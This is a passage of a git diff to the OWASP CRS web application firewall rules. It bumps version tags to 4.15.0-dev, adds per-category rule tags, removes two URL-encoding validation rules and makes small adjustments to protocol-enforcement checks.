     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-913-SCANNER-DETECTION.conf b/rules/REQUEST-913-SCANNER-DETECTION.conf
index e9e0db7d7..b10f77c9e 100644
--- a/rules/REQUEST-913-SCANNER-DETECTION.conf
+++ b/rules/REQUEST-913-SCANNER-DETECTION.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -14,8 +14,8 @@
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -49,31 +49,32 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \
     tag:'attack-reputation-scanner',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/SCANNER-DETECTION',\
     tag:'capec/1000/118/224/541/310',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
index 2b4e3f285..9408c2b20 100644
--- a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+++ b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -23,8 +23,8 @@
 #
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -63,8 +63,9 @@ SecRule REQUEST_LINE "!@rx (?i)^(?:get /[^#\?]*(?:\?[^\s\x0b#]*)?(?:#[^\s\x0b]*)
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
 
@@ -118,8 +119,9 @@ SecRule FILES|FILES_NAMES "!@rx (?i)^(?:&(?:(?:[acegilnorsuz]acut|[aeiou]grav|[a
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -147,8 +149,9 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -181,8 +184,9 @@ SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule REQUEST_HEADERS:Content-Length "!@rx ^0?$" \
@@ -206,8 +210,9 @@ SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \
@@ -246,8 +251,9 @@ SecRule REQUEST_PROTOCOL "!@within HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_METHOD "@streq POST" \
@@ -276,8 +282,9 @@ SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     chain"
     SecRule &REQUEST_HEADERS:Content-Length "!@eq 0" \
@@ -314,8 +321,9 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx (\d+)-(\d+)" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     chain"
     SecRule TX:2 "@lt %{tx.1}" \
@@ -346,89 +354,12 @@ SecRule REQUEST_HEADERS:Connection "@rx \b(?:keep-alive|close),\s?(?:keep-alive|
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
 
-#
-# Check URL encodings
-#
-# -=[ Rule Logic ]=-
-# There are two different chained rules.    We need to separate them as we are inspecting two
-# different variables - REQUEST_URI_RAW and REQUEST_BODY.   For REQUEST_BODY, we only want to
-# run the @validateUrlEncoding operator if the content-type is application/x-www-form-urlencoding.
-#
-# We exclude the last path segment from validation because it could be a file name, which could
-# easily contain a '%' character that is not part of a URI encoded sequence.
-#
-# -=[ References ]=-
-# http://www.ietf.org/rfc/rfc1738.txt
-#
-# -=[ Example payload ]=-
-# http://localhost/?s=a%20b%20c%'/
-# reason: %'/ is not a valid url encoding
-#
-# Regular expression generated from regex-assembly/920220-chain1.ra.
-# To update the regular expression run the following shell script
-# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
-#   crs-toolchain regex update 920220-chain1
-#
-SecRule REQUEST_URI_RAW "@rx \x25" \
-    "id:920220,\
-    phase:1,\
-    block,\
-    t:none,t:urlDecodeUni,\
-    msg:'URL Encoding Abuse Attack Attempt',\
-    logdata:'%{REQUEST_URI_RAW}',\
-    tag:'application-multi',\
-    tag:'language-multi',\
-    tag:'platform-multi',\
-    tag:'attack-protocol',\
-    tag:'paranoia-level/1',\
-    tag:'OWASP_CRS',\
-    tag:'capec/1000/255/153/267/72',\
-    ver:'OWASP_CRS/4.6.0',\
-    severity:'CRITICAL',\
-    chain"
-    SecRule REQUEST_URI_RAW "@rx ^(.*)/(?:[^\?]+)?(\?.*)?$" \
-        "capture,\
-        chain"
-        SecRule TX:1|TX:2 "@validateUrlEncoding" \
-            "t:none,t:urlDecodeUni,\
-            setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-
-
-# Validate URI encoding of the last path segment, only if it does not look like a file name.
-# A file name could easily contain a '%' character that is not part of a URI encoded sequence.
-#
-# Regular expression generated from regex-assembly/920221.ra.
-# To update the regular expression run the following shell script
-# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
-#   crs-toolchain regex update 920221
-#
-SecRule REQUEST_BASENAME "!@rx ^.*%.*\.[^\s\x0b\.]+$" \
-    "id:920221,\
-    phase:1,\
-    block,\
-    capture,\
-    t:none,t:urlDecodeUni,\
-    msg:'URL Encoding Abuse Attack Attempt',\
-    logdata:'%{REQUEST_BASENAME}',\
-    tag:'application-multi',\
-    tag:'language-multi',\
-    tag:'platform-multi',\
-    tag:'attack-protocol',\
-    tag:'paranoia-level/1',\
-    tag:'OWASP_CRS',\
-    tag:'capec/1000/255/153/267/72',\
-    ver:'OWASP_CRS/4.6.0',\
-    severity:'CRITICAL',\
-    chain"
-    SecRule TX:0 "@validateUrlEncoding" \
-        "t:none,t:urlDecodeUni,\
-        setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-
 
 #
 # Check UTF encoding
@@ -452,8 +383,9 @@ SecRule TX:CRS_VALIDATE_UTF8_ENCODING "@eq 1" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/255/153/267',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "@validateUtf8Encoding" \
@@ -496,8 +428,9 @@ SecRule REQUEST_URI|REQUEST_BODY "@rx (?i)%uff[0-9a-f]{2}" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/255/153/267/72',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
 
@@ -539,7 +472,7 @@ SecRule REQUEST_URI|REQUEST_BODY "@rx (?i)%uff[0-9a-f]{2}" \
 # 920274 generally has few positives. However, it would detect rare attacks
 # on Accept request headers and friends.
 
-SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-255" \
+SecRule REQUEST_URI_RAW|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-255" \
     "id:920270,\
     phase:2,\
     block,\
@@ -552,8 +485,9 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-255" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -583,9 +517,10 @@ SecRule &REQUEST_HEADERS:Host "@eq 0" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}',\
     skipAfter:END-HOST-CHECK"
@@ -603,8 +538,9 @@ SecRule REQUEST_HEADERS:Host "@rx ^$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -643,8 +579,9 @@ SecRule REQUEST_HEADERS:Accept "@rx ^$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'NOTICE',\
     chain"
     SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \
@@ -668,8 +605,9 @@ SecRule REQUEST_HEADERS:Accept "@rx ^$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'NOTICE',\
     chain"
     SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \
@@ -701,8 +639,9 @@ SecRule REQUEST_HEADERS:User-Agent "@rx ^$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'NOTICE',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'"
 
@@ -738,8 +677,9 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'NOTICE',\
     chain"
     SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \
@@ -782,9 +722,10 @@ SecRule REQUEST_HEADERS:Host "@rx (?:^([\d.]+|\[[\da-f:]+\]|[\da-f:]+)(:[\d]+)?$
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
 
@@ -815,8 +756,9 @@ SecRule &TX:MAX_NUM_ARGS "@eq 1" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule &ARGS "@gt %{tx.max_num_args}" \
@@ -840,8 +782,9 @@ SecRule &TX:ARG_NAME_LENGTH "@eq 1" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule ARGS_NAMES "@gt %{tx.arg_name_length}" \
@@ -867,8 +810,9 @@ SecRule &TX:ARG_LENGTH "@eq 1" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule ARGS "@gt %{tx.arg_length}" \
@@ -891,8 +835,9 @@ SecRule &TX:TOTAL_ARG_LENGTH "@eq 1" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule ARGS_COMBINED_SIZE "@gt %{tx.total_arg_length}" \
@@ -916,8 +861,9 @@ SecRule &TX:MAX_FILE_SIZE "@eq 1" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \
@@ -942,8 +888,9 @@ SecRule &TX:COMBINED_FILE_SIZES "@eq 1" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule FILES_COMBINED_SIZE "@gt %{tx.combined_file_sizes}" \
@@ -968,7 +915,7 @@ SecRule &TX:COMBINED_FILE_SIZES "@eq 1" \
 # - application/soap+xml; charset=utf-8; action="urn:localhost-hwh#getQuestions"
 # - application/*+json
 
-SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+*-]+(?:\s?;\s?(?:action|boundary|charset|component|start(?:-info)?|type|version)\s?=\s?['\"\w.()+,/:=?<>@#*-]+)*$" \
+SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+*-]+(?:\s?;\s*(?:action|boundary|charset|component|start(?:-info)?|type|version)\s?=\s?['\"\w.()+,/:=?<>@#*-]+)*$" \
     "id:920470,\
     phase:1,\
     block,\
@@ -981,9 +928,10 @@ SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+*-]+(?:\s?;\s?(?:action|bounda
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -1004,9 +952,10 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.content_type=|%{tx.0}|',\
     chain"
@@ -1032,9 +981,10 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.content_type_charset=|%{tx.1}|',\
     chain"
@@ -1059,9 +1009,10 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -1081,9 +1032,10 @@ SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
